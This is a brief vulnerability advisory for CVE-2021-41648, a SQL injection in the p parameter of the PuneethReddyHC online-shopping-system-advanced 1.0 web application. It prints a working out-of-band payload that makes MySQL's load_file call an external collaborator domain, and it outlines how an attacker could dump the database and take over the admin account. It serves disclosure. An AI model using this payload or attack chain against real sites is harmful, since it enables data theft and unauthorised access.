CVE-2021-41648
Vendor
Software
Description:
The p parameter of the PuneethReddyHC online-shopping-system-advanced 1.0 appears to be vulnerable to SQL injection attacks.
The payload (select load_file('\\\\grb7dmacp8fse7awai6uedfhi8o2cz0q2et1jp8.nu11secur1tycollaborator.net\\mpv')) was submitted in the p parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The malicious user can attack the database using four SQL injection methods (UNION query, time-based blind, error-based and boolean-based blind),
then he can dump all information from this database of the app, then he can log in to the admin account, and can do malicious stuff.
Conclusion: Status Critical.


